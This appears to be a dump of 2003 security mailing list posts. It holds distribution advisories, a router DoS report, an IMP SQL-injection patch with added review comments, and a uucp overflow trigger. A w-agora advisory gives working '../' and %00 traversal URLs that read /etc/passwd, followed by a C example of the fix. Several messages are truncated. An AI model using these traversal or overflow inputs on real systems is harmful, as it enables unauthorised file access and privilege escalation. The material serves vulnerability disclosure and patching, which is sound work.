Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQE+HYzeW5ql+IAeqTIRAsF7AJwOJotOb7a4N02/Pk/J6dibAj6bagCbB7lY
zdY2WnKneQ1GPGV7ZMkutNk=
=mkx7
-----END PGP SIGNATURE-----
Re: Efficient Networks 5861 DSL Router
On Fri, 10 Jan 2003 11:05:01 -, "Greg Bolshaw" <[EMAIL PROTECTED]> wrote:

> Product: Efficient Networks 5861 DSL Router
>          http://www.efficient.com/ebz/5800.html
> Tested version: 5.3.80 (Latest firmware)
> Advisory date: 10/01/2003
> Severity: Moderate
>
> Background
>
[...]
>
> As far as I am aware, the 5861 is the standard router provided to all ADSL
> business customers in the UK.

From which provider?

>
> Details
>
> When using the builtin IP filtering to block incoming TCP SYN flags, a
> simple portscan to the WAN interface of the router will cause it to lock
> up, and eventually restart.

I have confirmed this using the Sygate port scanner found at http://scan.sygate.com.

[...]

> Solution
>
> There is currently no fix for this exploit. I have contacted Efficient
> Networks to inform them of the problem.

A workaround is to disable the filtering on the router and make sure all unsolicited packets are forwarded to a machine with a capable firewall installed. This is what I am doing in one instance.

Andrew.
--
Andrew Hodgson, Bromyard, Herefordshire, UK.
Email: [EMAIL PROTECTED]
Re: Opentype font file causes Windows to restart.
I suppose that IE's 'automatic font download' support (which is on by default) would exacerbate this problem, correct? --dil
Request for assistance: trying to find Zardoz Security Digest Files
I am the owner of a project designed to preserve computer security digests and I need to ask the community for help locating material relating to the Zardoz Security Digest. Without this material, I am not able to comprehensively document the history of this digest.

In particular, I am unable to locate the following (circa 1990 - 1991):

    Volume 1, Issues 1, 5, 9, 22, 23, 26, 28 and 44+ (if they exist)
    Volume 2, Issues 6, 14, and 16+ (if they exist)
    Volume 3, Issues 5, 6, 8, 9, 10, 14 and 16+ (if they exist)

I am willing to fund shipping / conversion of old media if necessary. If you can help, please do. This project, while small, has generated interest so far, and will over time represent an important archive of material. This is my appeal to you.

If you would like to visit work in progress, please do at http://securitydigest.org/, and in particular the recent documentation of the Unix Security Mailing List at http://securitydigest.org/unix/ which has been previously announced to this forum.

Alan.
--
Curator of "The `Security Digest` Archives"
[EMAIL PROTECTED]
http://securitydigest.org
[SECURITY] [DSA 224-1] New canna packages fix buffer overflow and denial of service
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 224-1                     [EMAIL PROTECTED]
http://www.debian.org/security/                             Martin Schulze
January 8th, 2003                       http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : canna
Vulnerability  : buffer overflow and more
Problem-Type   : local, remote
Debian-specific: no
CVE Id         : CAN-2002-1158 CAN-2002-1159
BugTraq Id     : 6351 6354

Several vulnerabilities have been discovered in canna, a Japanese input system. The Common Vulnerabilities and Exposures (CVE) project identified the following vulnerabilities:

* CAN-2002-1158 (BugTraq Id 6351): "hsj" of Shadow Penguin Security discovered a heap overflow vulnerability in the irw_through function in the canna server.

* CAN-2002-1159 (BugTraq Id 6354): Shinra Aida of the Canna project discovered that canna does not properly validate requests, which allows remote attackers to cause a denial of service or an information leak.

For the current stable distribution (woody) these problems have been fixed in version 3.5b2-46.2.

For the old stable distribution (potato) these problems have been fixed in version 3.5b2-25.2.

For the unstable distribution (sid) these problems have been fixed in version 3.6p1-1.

We recommend that you upgrade your canna packages.

Installation Instructions
- -------------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 2.2 alias potato
- ---------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/c/canna/canna_3.5b2-25.2.dsc
    Size/MD5 checksum:      621 3eefe4cadee26f2e74c148836428d6b1
  http://security.debian.org/pool/updates/main/c/canna/canna_3.5b2-25.2.diff.gz
    Size/MD5 checksum:   131811 63bb6ebf66965b21fd2d80107f720dad
  http://ftp.debian.org/debian/dists/potato/main/source/utils/canna_3.5b2.orig.tar.gz
    Size/MD5 checksum:  1328622 5e1d8527d397c3914ce6104dac3db466

Alpha architecture:

  http://security.debian.org/pool/updates/main/c/canna/canna_3.5b2-25.2_alpha.deb
    Size/MD5 checksum:   901812 a4b31bcbfc19c9ce1ee5575595399301
  http://security.debian.org/pool/updates/main/c/canna/canna-utils_3.5b2-25.2_alpha.deb
    Size/MD5 checksum:   119214 74679fa94fd305f40bb396dc993ba780
  http://security.debian.org/pool/updates/main/c/canna/libcanna1g_3.5b2-25.2_alpha.deb
    Size/MD5 checksum:   478650 1e2d41c1ebca00e898652dcf720492a3
  http://security.debian.org/pool/updates/main/c/canna/libcanna1g-dev_3.5b2-25.2_alpha.deb
    Size/MD5 checksum:   701894 a402fb38f84c3315e71efc468c009324

ARM architecture:

  http://security.debian.org/pool/updates/main/c/canna/canna_3.5b2-25.2_arm.deb
    Size/MD5 checksum:   839926 6b88eb89835706fa151d393dadbedd1a
  http://security.debian.org/pool/updates/main/c/canna/canna-utils_3.5b2-25.2_arm.deb
    Size/MD5 checksum:   107114 21b9623c1d662b2d23017634ebcb69dc
  http://security.debian.org/pool/updates/main/c/canna/libcanna1g_3.5b2-25.2_arm.deb
    Size/MD5 checksum:   409604 01e0b806a238fdf417d6892ab929b1d5
  http://security.debian.org/pool/updates/main/c/canna/libcanna1g-dev_3.5b2-25.2_arm.deb
    Size/MD5 checksum:   593312 f04a0c824bed79d0e5ea6ee13a9ee838

Intel IA-32 architecture:

  http://security.debian.org/pool/updates/main/c/canna/canna_3.5b2-25.2_i386.deb
    Size/MD5 checksum:   831452 79ede5024732deae7a3f106ca94d1d65
  http://security.debian.org/pool/updates/main/c/canna/canna-utils_3.5b2-25.2_i386.deb
    Size/MD5 checksum:   104902 5e7805af7d37cb33729cb4dac9eba20b
  http://security.debian.org/pool/updates/main/c/canna/libcanna1g_3.5b2-25.2_i386.deb
    Size/MD5 checksum:   378598 6caec31ea8eb30886c67ea6b6b7f1de2
  http://security.debian.org/pool/updates/main/c/canna/libcanna1g-dev_3.5b2-25.2_i386.deb
    Size/MD5 checksum:   524486 e1a321f6b721c3558d01c30bb7853ed0

Motorola 680x0 architecture:

  http://security.debian.org/pool/updates/main/c/canna/canna_3.5b2-25.2_m68k.deb
    Size/MD5 checksum:   822694 eb6ffca2442a0e349d75442c39b60058
  http://security.debian.org/pool/updates/main/c/canna/canna-utils_3.5b2-25.2_m68k.deb
    Size/MD5 checksum:   103996 569c48f8230b8a32e1566abbe8119a97
  http://security.debian.org/pool/updates/main/c/canna/libcanna1g_3.5b2-25.2_m68k.deb
    Size/MD5 checksum:   372478 c70244a70b11a0a12469e73a5d45700a
  http://security.debian.org/pool/update
MDKSA-2003:005 - Updated leafnode packages fix remote DoS vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Mandrake Linux Security Update Advisory

Package name:       leafnode
Advisory ID:        MDKSA-2003:005
Date:               January 14th, 2003
Affected versions:  8.2, 9.0

Problem Description:

A vulnerability was discovered by Jan Knutar in leafnode that Mark Brown pointed out could be used in a Denial of Service attack. This vulnerability causes leafnode to go into an infinite loop with 100% CPU use when an article that has been crossposted to several groups, one of which is the prefix of another, is requested by its Message-ID. This vulnerability was introduced in 1.9.20 and fixed upstream in version 1.9.30.

Only Mandrake Linux 9.0 is affected by this, but version 1.9.19 (which shipped with Mandrake Linux 8.2) is receiving an update due to critical bugs in it that can corrupt parts of its news spool under certain circumstances.

References:

http://marc.theaimsgroup.com/?l=bugtraq&m=104127108823436&w=2

Updated Packages:

Mandrake Linux 8.2:
a9c3f6f4198c88e71f7c78281d6ead7b  8.2/RPMS/leafnode-1.9.31-1.1mdk.i586.rpm
25f0be374ababf45db444a9b64ab1a98  8.2/SRPMS/leafnode-1.9.31-1.1mdk.src.rpm

Mandrake Linux 8.2/PPC:
c39ab8855cbb4d0727c796242edda60c  ppc/8.2/RPMS/leafnode-1.9.31-1.1mdk.ppc.rpm
25f0be374ababf45db444a9b64ab1a98  ppc/8.2/SRPMS/leafnode-1.9.31-1.1mdk.src.rpm

Mandrake Linux 9.0:
4749ee927caa55f15adddadd473a3d12  9.0/RPMS/leafnode-1.9.31-1.1mdk.i586.rpm
25f0be374ababf45db444a9b64ab1a98  9.0/SRPMS/leafnode-1.9.31-1.1mdk.src.rpm

Bug IDs fixed (see https://qa.mandrakesoft.com for more information):

To upgrade automatically, use MandrakeUpdate. The verification of md5 checksums and GPG signatures is performed automatically for you.

If you want to upgrade manually, download the updated package from one of our FTP server mirrors and upgrade with "rpm -Fvh *.rpm". A list of FTP mirrors can be obtained from:

    http://www.mandrakesecure.net/en/ftp.php

Please verify the update prior to upgrading to ensure the integrity of the downloaded package. You can do this with the command:

    rpm --checksig <filename>

All packages are signed by MandrakeSoft for security. You can obtain the GPG public key of the Mandrake Linux Security Team from:

    https://www.mandrakesecure.net/RPM-GPG-KEYS

Please be aware that sometimes it takes the mirrors a few hours to update.

You can view other update advisories for Mandrake Linux at:

    http://www.mandrakesecure.net/en/advisories/

MandrakeSoft has several security-related mailing list services that anyone can subscribe to. Information on these lists can be obtained by visiting:

    http://www.mandrakesecure.net/en/mlist.php

If you want to report vulnerabilities, please contact

    security_linux-mandrake.com

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Linux Mandrake Security Team

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.0.7 (GNU/Linux)

mQGiBDlp594RBAC2tDozI3ZgQsE7XwxurJCJrX0L5vx7SDByR5GHDdWekGhdiday
L4nfUax+SeR9SCoCgTgPW1xB8vtQc8/sinJlMjp9197a2iKM0FOcPlkpa3HcOdt7
WKJqQhlMrHvRcsivzcgqjH44GBBJIT6sygUF8k0lU6YnMHj5MPc/NGWt8wCg9vKo
P0l5QVAFSsHtqcU9W8cc7wMEAJzQsAlnvPXDBfBLEH6u7ptWFdp0GvbSuG2wRaPl
hynHvRiE01ZvwbJZXsPsKm1z7uVoW+NknKLunWKB5axrNXDHxCYJBzY3jTeFjsqx
PFZkIEAQphLTkeXXelAjQ5u9tEshPswEtMvJvUgNiAfbzHfPYmq8D6x5xOw1IySg
2e/LBACxr2UJYCCB2BZ3p508mAB0RpuLGukq+7UWiOizy+kSskIBg2O7sQkVY/Cs
iyGEo4XvXqZFMY39RBdfm2GY+WB/5NFiTOYJRKjfprP6K1YbtsmctsX8dG+foKsD
LLFs7OuVfaydLQYp1iiN6D+LJDSMPM8/LCWzZsgr9EKJ8NXiyrQ6TGludXggTWFu
ZHJha2UgU2VjdXJpdHkgVGVhbSA8c2VjdXJpdHlAbGludXgtbWFuZHJha2UuY29t
PohWBBMRAgAWBQI5aefeBAsKBAMDFQMCAxYCAQIXgAAKCRCaqNDQIkWKmK6LAKCy
/NInDsaMSI+WHwrquwC5PZrcnQCeI+v3gUDsNfQfiKBvQSANu1hdulqIRgQQEQIA
BgUCOtNVGQAKCRBZ5w3um0pAJJWQAKDUoL5He+mKbfrMaTuyU5lmRyJ0fwCgoFAP
WdvQlu/kFjphF740XeOwtOqIRgQQEQIABgUCOu8A6QAKCRBynDnb9lq3CnpjAJ4w
Pk0SEE9U4r40IxWpwLU+wrWVugCdFfSPllPpZRCiaC7HwbFcfExRmPaIRgQQEQIA
BgUCPI+UAwAKCRDniYrgcHcf8xK5AKCm/Mq8qP8GE0o1hEX22QsJMZwH5gCfZ72H
8TacOb3oAmBdprf+K6gkdOiIRgQQEQIABgUCOtOieAAKCRCv2bZyU0yB80MeAJ9K
+jXt0cKuaUonRU+CRGetk6t9dgCfTRRL6/puOKdD6md70+K5EBBSvsG0OE1hbmRy
YWtlIExpbnV4IFNlY3VyaXR5IFRlYW0gPHNlY3VyaXR5QG1hbmRyYWtlc29mdC5j
b20+iFcEExECABcFAjyPnuUFCwcKAwQDFQMCAxYCAQIXgAAKCRCaqNDQIkWKmFi+
AJsHhohgnU3ik4+gy3EdFlB2i/MBoACg6lHn5cnVvTcmgNccWxeNxLLZI5e5AQ0E
OWnn7xAEAOQlTVY4TiNo5V/iP0J1xnqjqlqZsU7yEBKo/gZz6/+hx75RURe1ebiJ
9F779FQbpJ9Epz1KLSXvq974rnVb813zuGdmgFyk+ryA/rTR2RQ8h+EoNkwmATzR
xBXVJb57fFQj
MDKSA-2003:002 - Updated xpdf packages fix integer overflow vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Mandrake Linux Security Update Advisory

Package name:       xpdf
Advisory ID:        MDKSA-2003:002
Date:               January 9th, 2003
Affected versions:  7.2, 8.0, 8.1, 8.2, 9.0

Problem Description:

The pdftops filter found in both the xpdf and CUPS packages suffers from an integer overflow that can be exploited to gain the privilege of the victim user.

References:

http://www.idefense.com/advisory/12.23.02.txt

Updated Packages:

Linux-Mandrake 7.2:
78e3809401a324ba6c95f07c723565a9  7.2/RPMS/xpdf-1.01-4.2mdk.i586.rpm
369eb053232cab228db800582ac45700  7.2/SRPMS/xpdf-1.01-4.2mdk.src.rpm

Mandrake Linux 8.0:
e6483cb19bdd5ea5c54aa4c8a8245ad2  8.0/RPMS/xpdf-1.01-4.1mdk.i586.rpm
398a6e6e9240c9a8a31f44d55703fa93  8.0/SRPMS/xpdf-1.01-4.1mdk.src.rpm

Mandrake Linux 8.0/PPC:
8e45ed607184f92df7ba11d8eeaefe1e  ppc/8.0/RPMS/xpdf-1.01-4.1mdk.ppc.rpm
398a6e6e9240c9a8a31f44d55703fa93  ppc/8.0/SRPMS/xpdf-1.01-4.1mdk.src.rpm

Mandrake Linux 8.1:
ff859e43804e7c4df40cde357daa80d8  8.1/RPMS/xpdf-1.01-4.1mdk.i586.rpm
398a6e6e9240c9a8a31f44d55703fa93  8.1/SRPMS/xpdf-1.01-4.1mdk.src.rpm

Mandrake Linux 8.1/IA64:
efc7af1c1cf81ad4ab323e39fd012b21  ia64/8.1/RPMS/xpdf-1.01-4.1mdk.ia64.rpm
398a6e6e9240c9a8a31f44d55703fa93  ia64/8.1/SRPMS/xpdf-1.01-4.1mdk.src.rpm

Mandrake Linux 8.2:
682bd75ce5f02a5b487d8f5fc65d4a91  8.2/RPMS/xpdf-1.01-4.1mdk.i586.rpm
398a6e6e9240c9a8a31f44d55703fa93  8.2/SRPMS/xpdf-1.01-4.1mdk.src.rpm

Mandrake Linux 8.2/PPC:
ee689d1322befa34df37ca265ea03318  ppc/8.2/RPMS/xpdf-1.01-4.1mdk.ppc.rpm
398a6e6e9240c9a8a31f44d55703fa93  ppc/8.2/SRPMS/xpdf-1.01-4.1mdk.src.rpm

Mandrake Linux 9.0:
61713e31f42b21c9c05f36affdc320a8  9.0/RPMS/xpdf-1.01-4.1mdk.i586.rpm
398a6e6e9240c9a8a31f44d55703fa93  9.0/SRPMS/xpdf-1.01-4.1mdk.src.rpm

Bug IDs fixed (see https://qa.mandrakesoft.com for more information):

To upgrade automatically, use MandrakeUpdate. The verification of md5 checksums and GPG signatures is performed automatically for you.

If you want to upgrade manually, download the updated package from one of our FTP server mirrors and upgrade with "rpm -Fvh *.rpm". A list of FTP mirrors can be obtained from:

    http://www.mandrakesecure.net/en/ftp.php

Please verify the update prior to upgrading to ensure the integrity of the downloaded package. You can do this with the command:

    rpm --checksig <filename>

All packages are signed by MandrakeSoft for security. You can obtain the GPG public key of the Mandrake Linux Security Team from:

    https://www.mandrakesecure.net/RPM-GPG-KEYS

Please be aware that sometimes it takes the mirrors a few hours to update.

You can view other update advisories for Mandrake Linux at:

    http://www.mandrakesecure.net/en/advisories/

MandrakeSoft has several security-related mailing list services that anyone can subscribe to. Information on these lists can be obtained by visiting:

    http://www.mandrakesecure.net/en/mlist.php

If you want to report vulnerabilities, please contact

    security_linux-mandrake.com

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Linux Mandrake Security Team

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: GnuPG v1.0.7 (GNU/Linux)

mQGiBDlp594RBAC2tDozI3ZgQsE7XwxurJCJrX0L5vx7SDByR5GHDdWekGhdiday
L4nfUax+SeR9SCoCgTgPW1xB8vtQc8/sinJlMjp9197a2iKM0FOcPlkpa3HcOdt7
WKJqQhlMrHvRcsivzcgqjH44GBBJIT6sygUF8k0lU6YnMHj5MPc/NGWt8wCg9vKo
P0l5QVAFSsHtqcU9W8cc7wMEAJzQsAlnvPXDBfBLEH6u7ptWFdp0GvbSuG2wRaPl
hynHvRiE01ZvwbJZXsPsKm1z7uVoW+NknKLunWKB5axrNXDHxCYJBzY3jTeFjsqx
PFZkIEAQphLTkeXXelAjQ5u9tEshPswEtMvJvUgNiAfbzHfPYmq8D6x5xOw1IySg
2e/LBACxr2UJYCCB2BZ3p508mAB0RpuLGukq+7UWiOizy+kSskIBg2O7sQkVY/Cs
iyGEo4XvXqZFMY39RBdfm2GY+WB/5NFiTOYJRKjfprP6K1YbtsmctsX8dG+foKsD
LLFs7OuVfaydLQYp1iiN6D+LJDSMPM8/LCWzZsgr9EKJ8NXiyrQ6TGludXggTWFu
ZHJha2UgU2VjdXJpdHkgVGVhbSA8c2VjdXJpdHlAbGludXgtbWFuZHJha2UuY29t
PohWBBMRAgAWBQI5aefeBAsKBAMDFQMCAxYCAQIXgAAKCRCaqNDQIkWKmK6LAKCy
/NInDsaMSI+WHwrquwC5PZrcnQCeI+v3gUDsNfQfiKBvQSANu1hdulqIRgQQEQIA
BgUCOtNVGQAKCRBZ5w3um0pAJJWQAKDUoL5He+mKbfrMaTuyU5lmRyJ0fwCgoFAP
WdvQlu/kFjphF740XeOwtOqIRgQQEQIABgUCOu8A6QAKCRBynDnb9lq3CnpjAJ4w
Pk0SEE9U4r40IxWpwLU+wrWVugCdFfSPllPpZRCiaC7HwbFcfExRmPaIRgQQEQIA
BgUCPI+UAwAKCRDniYrgcHcf8xK5AKCm/Mq8qP8GE0o1hEX22QsJMZwH5gCfZ72H
8TacOb3oAmBdprf+K6gkdOiIRgQQEQIABgUCOtOieAAKCRCv2bZyU0yB80MeAJ9K
+jXt0cKuaUonRU+CRGetk6t9dgCfTRRL6/puOKdD6md70+K5EBBSvsG0OE1hbmRy
YWtlIExpbnV4IFNlY3VyaXR5IFRlYW0gPHNlY3VyaXR5QG1
Bug in w-agora
=====================================
== Shell Security Team             ==
== Advisory for W-agora            ==
=====================================

- Product        : w-agora
- Tested version : 4.1.5
- Website        : http://www.w-agora.net
- Discovered by  : Sonyy
- Vendor status  : informed
- Problem        : directory traversal in w-agora: the bn and file request parameters are used to build file paths, so any file readable by the web server can be opened

The bug:
========

index.php builds the configuration file path directly from the bn parameter:

    if (empty($bn)) {
        # No forum selected -> default to 'site' configuration
        $site     = empty($site) ? "agora" : $site;
        $cfg_file = "${cfg_dir}/site_${site}.${ext}";
        $expnd    = "all";
    } else {
        $cfg_file = "${cfg_dir}/${bn}.${ext}";
    }

Nothing removes "../" from $bn, and a %00 in the URL puts a NUL byte into the string, so the ".${ext}" suffix is cut off when the path reaches the C library: the attacker chooses the whole path.

Exploit:
========

index.php:

    http://www.w-agora.net/current/index.php?site=demos&bn=../../../../../../../../../../etc/passwd%00

And modules.php:

    http://www.w-agora.net/current/modules.php?mod=fm&file=../../../../../../../../../../etc/passwd%00&bn=fm_d1

Any question:
=============

Sonyy --> [EMAIL PROTECTED]
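Why the %00 in the advisory's URLs works, and what a fix looks like, as an added example that is not w-agora code: PHP interpolates "${cfg_dir}/${bn}.${ext}" into a byte string that may contain a NUL, but the open() underneath is a C-string API and stops at that NUL, so the ".${ext}" suffix that was supposed to confine reads to configuration files disappears. The C below reproduces both steps (build the bytes the way PHP does, then look at what open() would see) and then builds the path the safe way, from an allow-listed name whose length comes from the request rather than from strlen(). The directory, extension and sample names are constructed for the example.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not w-agora code: why "../" plus %00 in the bn
 * parameter reaches /etc/passwd, and how to build the path safely.
 * The directory, extension and names below are constructed. */

/* Mimic PHP string interpolation: copy the raw bytes, NUL included.
 * Returns the number of bytes built (a terminator is added after them),
 * or 0 if it does not fit. */
size_t cfg_path_build(const char *cfg_dir, const char *bn, size_t bn_len,
                      const char *ext, char *out, size_t outlen)
{
    size_t dl = strlen(cfg_dir), el = strlen(ext);
    size_t total = dl + 1 + bn_len + 1 + el;
    if (total + 1 > outlen)
        return 0;
    memcpy(out, cfg_dir, dl);
    out[dl] = '/';
    memcpy(out + dl + 1, bn, bn_len);
    out[dl + 1 + bn_len] = '.';
    memcpy(out + dl + 2 + bn_len, ext, el);
    out[total] = '\0';
    return total;
}

/* The path as a C-string API such as fopen() sees it: everything from
 * the first NUL on is invisible. Static buffer; not reentrant. */
const char *cfg_path_as_opened(const char *cfg_dir, const char *bn,
                               size_t bn_len, const char *ext)
{
    static char path[512];
    if (cfg_path_build(cfg_dir, bn, bn_len, ext, path, sizeof path) == 0)
        path[0] = '\0';
    return path;
}

/* How many bytes of the built path never reach the kernel (0 for a
 * clean name; NUL + tail + ".ext" for the %00 trick). */
size_t cfg_path_truncated_bytes(const char *cfg_dir, const char *bn,
                                size_t bn_len, const char *ext)
{
    char path[512];
    size_t built = cfg_path_build(cfg_dir, bn, bn_len, ext, path, sizeof path);
    return built ? built - strlen(path) : 0;
}

/* Allow-list the name: non-empty, bounded, [A-Za-z0-9_-] only. That
 * excludes '/', '\\', '.' and NUL with one rule, instead of trying to
 * strip "../" after the fact. The length comes from the request, not
 * from strlen(), so an embedded NUL is seen and rejected. */
int cfg_name_ok(const char *bn, size_t bn_len)
{
    if (bn_len == 0 || bn_len > 64)
        return 0;
    for (size_t i = 0; i < bn_len; i++) {
        char c = bn[i];
        int ok = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                 (c >= '0' && c <= '9') || c == '_' || c == '-';
        if (!ok)
            return 0;
    }
    return 1;
}

/* Hardened path builder: NULL when the name is rejected. */
const char *cfg_path_safe(const char *cfg_dir, const char *bn,
                          size_t bn_len, const char *ext)
{
    static char path[512];
    if (!cfg_name_ok(bn, bn_len))
        return NULL;
    int n = snprintf(path, sizeof path, "%s/%.*s.%s",
                     cfg_dir, (int)bn_len, bn, ext);
    if (n < 0 || (size_t)n >= sizeof path)
        return NULL;
    return path;
}

int main(void)
{
    /* Constructed request values: the advisory's traversal with %00
     * decoded to a real NUL, and an ordinary forum name. */
    const char dir[] = "/srv/agora/conf";
    const char evil[] = "../../../etc/passwd\0junk";
    size_t evil_len = sizeof evil - 1;   /* 24 bytes, NUL included */

    printf("as opened : %s  (%zu bytes never reached open())\n",
           cfg_path_as_opened(dir, evil, evil_len, "php"),
           cfg_path_truncated_bytes(dir, evil, evil_len, "php"));
    printf("hardened  : %s\n",
           cfg_path_safe(dir, evil, evil_len, "php") ? "accepted" : "rejected");
    printf("hardened  : %s\n", cfg_path_safe(dir, "fm_d1", 5, "php"));
    return 0;
}
```

The same check applies to the file parameter of modules.php: a name is validated against what a forum or module name may contain, never by searching the request value for "../" or for a particular extension.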
Re: IMP 2.x SQL injection vulnerabilities
On Wed, 8 Jan 2003, Jouko Pynnonen informed us that:

> The vendor has been informed about this bug last month. Although there
> hasn't been any direct reply, there was a comment on this on the IMP
> mailing list: "2.2.x is officially deprecated/unsupported. This does not
> apply to 3.x.".
>
> Versions up to and including 2.2.8 seem vulnerable. According to the
> author, version 3 isn't affected so upgrading to IMP 3 is recommended.
> This, and more information about IMP is available at http://horde.org/imp/.

What many software developers (including, but apparently not limited to, many commercial software vendors) seem to fail to realize is that some sites use their applications in production environments, with (in my case tens of thousands of) real users, and upgrading to the latest version, which includes numerous changes above and beyond the fix for the reported bug, is often difficult in the best of cases. In the case of Imp-2 -> Imp-3, the changes are much too significant for some of us to simply switch versions and hope our user community doesn't notice. It's a lot easier for us to patch in place to deal with the bug itself, and leave the upgrade to new features (and new bugs!) to be done in a more coordinated fashion, with time for users to evaluate the new interface, etc.

That being said, and thanks to the information in Jouko's advisory, I've patched our own Imp installation (which has now had so many patches applied I should start giving it local version numbers!) according to the appended. I hope others will be able to make use of this patch, and I especially hope that if I've overlooked something, others will point it out...
-- -- Sylvain Robitaille [EMAIL PROTECTED] Systems analyst Concordia University Instructional & Information TechnologyMontreal, Quebec, Canada -- # Of course, folks using Imp-2 with non-PostgreSQL databases will # need to adapt the following to the appropriate db.* file --- lib/db.pgsql.20030108 2000-12-20 15:45:33.0 -0500 +++ lib/db.pgsql 2003-01-08 15:18:25.0 -0500 @@ -26,6 +26,13 @@ function imp_add_address ($address, $nickname, $fullname, $user, $server) { global $default; +/* 2003/01/08 Sylvain Robitaille: Sanitize our input. */ +$address = addslashes($address); +$nickname = addslashes($nickname); +$fullname = addslashes($fullname); +$user = addslashes($user); +$server = addslashes($server); + /* post: adds $address, $nickname, $fullname to the addressbook for $user@$server returns true on success and false on failure */ @@ -41,6 +48,10 @@ function imp_check_prefs ($user, $server) { global $_imp_prefs_exist, $default; +/* 2003/01/08 Sylvain Robitaille: Sanitize our input. */ +$user = addslashes($user); +$server = addslashes($server); + if (isset($_imp_prefs_exist)) { return $_imp_prefs_exist; } @@ -59,6 +70,11 @@ function imp_delete_address ($address, $user, $server) { global $default; + /* 2003/01/08 Sylvain Robitaille: Sanitize our input. */ + $address = addslashes($address); + $user = addslashes($user); + $server = addslashes($server); + /* post: deletes $address from the addressbook of $user@$server returns true on success and false on failure */ @@ -72,6 +88,10 @@ function imp_get_addresses ($user, $server) { global $default; + /* 2003/01/08 Sylvain Robitaille: Sanitize our input. */ + $user = addslashes($user); + $server = addslashes($server); + /* post: returns a 2d array of addresses where each element is an array in which element 0 is the address, element 1 is the nickname, and element 2 is the fullname. 
@@ -92,6 +112,10 @@ function imp_get_from ($user, $server) { global $default; + /* 2003/01/08 Sylvain Robitaille: Sanitize our input. */ + $user = addslashes($user); + $server = addslashes($server); + /* post: returns the signature for the database key $user@$server (a string), or false on failure. */ @@ -105,6 +129,10 @@ function imp_get_fullname ($user, $server) { global $default; + /* 2003/01/08 Sylvain Robitaille: Sanitize our input. */ + $user = addslashes($user); + $server = addslashes($server); + /* post: returns the signature for the database key $user@$server (a string), or false on failure. */ @@ -118,6 +146,10 @@ function imp_get_lang ($user, $server) { global $default; + /* 2003/01/08 Sylvain Robitaille: Sanitize our input. */ + $user = addslashes($user); + $server = addslashes($server); + /* post: returns the signature for the database key $user@$server (a string), or false on failure. */ @@ -1
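Review bot: in the imp_add_address hunk, addslashes() is the wrong escaper for this file. lib/db.pgsql talks to PostgreSQL, and addslashes() is a generic PHP routine that backslash-escapes quotes, backslashes and NUL without regard to the back end's quoting rules; the pgsql extension's pg_escape_string() (PHP 4.2 and later) is the call that matches the server, and a bound-parameter query would remove the problem altogether. The five addslashes() lines also stack on magic_quotes_gpc: when that ini setting is on, $address, $nickname and $fullname arrive already escaped and are escaped a second time here, so every save adds a backslash to the stored value. Either strip the magic-quotes layer first (if (get_magic_quotes_gpc()) $address = stripslashes($address);) or move to pg_escape_string().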
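Review bot: the imp_check_prefs hunk is the same two lines ($user = addslashes($user); $server = addslashes($server);) that every later hunk repeats; escape these two values once, at the top of the file or where they are read from the session, rather than pasting the pair into each db function, so a function added or overlooked later is not silently left unescaped. The patch as posted already shows the risk: it is cut off in its last hunk ("@@ -1"), so a reader applying it by hand cannot tell which functions in lib/db.pgsql were covered and which were not.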
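Review bot: the comment "Sanitize our input" in the imp_delete_address hunk (and its copies) overstates what the lines do. addslashes() escapes a value for use inside a quoted SQL string literal; it does not validate $address as an e-mail address or tie it to $user@$server, and it does nothing if the value is ever interpolated unquoted, in a numeric position, or as a LIKE pattern, where % and _ pass straight through. Reword the comment to "escape for SQL string literals" so a later reader does not treat the value as trusted elsewhere, and keep any real validation in the caller.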
Buffer Overflow in uucp of SunOS 5.8
Hi everybody,

Though I don't know if this vulnerability has been discovered previously, I found a buffer overflow in the uucp program of SunOS 5.8 that could be used to get the privileges of uucp. The buffer overflows when uucp is executed with the parameter -s followed by a string bigger than 7525 bytes.

    hipnosis% uucp -s `perl -e 'print "A"x7526'`
    Segmentation Fault
    hipnosis% uucp -s `perl -e 'print "A"x7525'`
    hipnosis%

I have not been able to debug the program to see if the registers are overwritten, because I don't have any debugger on my machine and I don't have much time either.

My system:

    hipnosis% uname -a
    SunOS averroes 5.8 Generic_108528-03 sun4u sparc SUNW,Ultra-250
    hipnosis%

Suid:

    hipnosis% ls -l /usr/bin/uucp
    ---s--x--x   1 uucp     uucp       66940 eno  5  2000 /usr/bin/uucp
    hipnosis%

Well, bye everybody
GLSA: libpng
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - --------------------------------------------------------------------
GENTOO LINUX SECURITY ANNOUNCEMENT 200301-7
- - --------------------------------------------------------------------

PACKAGE : libpng
SUMMARY : buffer overflow
DATE    : 2003-01-08 15:01 UTC
EXPLOIT : remote

- - --------------------------------------------------------------------

From Debian Security Advisory DSA 213-1:

"Glenn Randers-Pehrson discovered a problem in connection with 16-bit samples from libpng, an interface for reading and writing PNG (Portable Network Graphics) format files. The starting offsets for the loops are calculated incorrectly which causes a buffer overrun beyond the beginning of the row buffer."

Read the full advisory at http://www.debian.org/security/2002/dsa-213

SOLUTION

It is recommended that all Gentoo Linux users who are running media-libs/libpng-1.2.5-r1 or earlier update their systems as follows:

    emerge rsync
    emerge libpng

If you also have libpng-1.0.12-r1 or earlier installed, update your system as follows:

    emerge \=media-libs/libpng-1.0.12-r2

Finish with:

    emerge clean

- - --------------------------------------------------------------------
[EMAIL PROTECTED] - GnuPG key is available at www.gentoo.org/~aliz
- - --------------------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
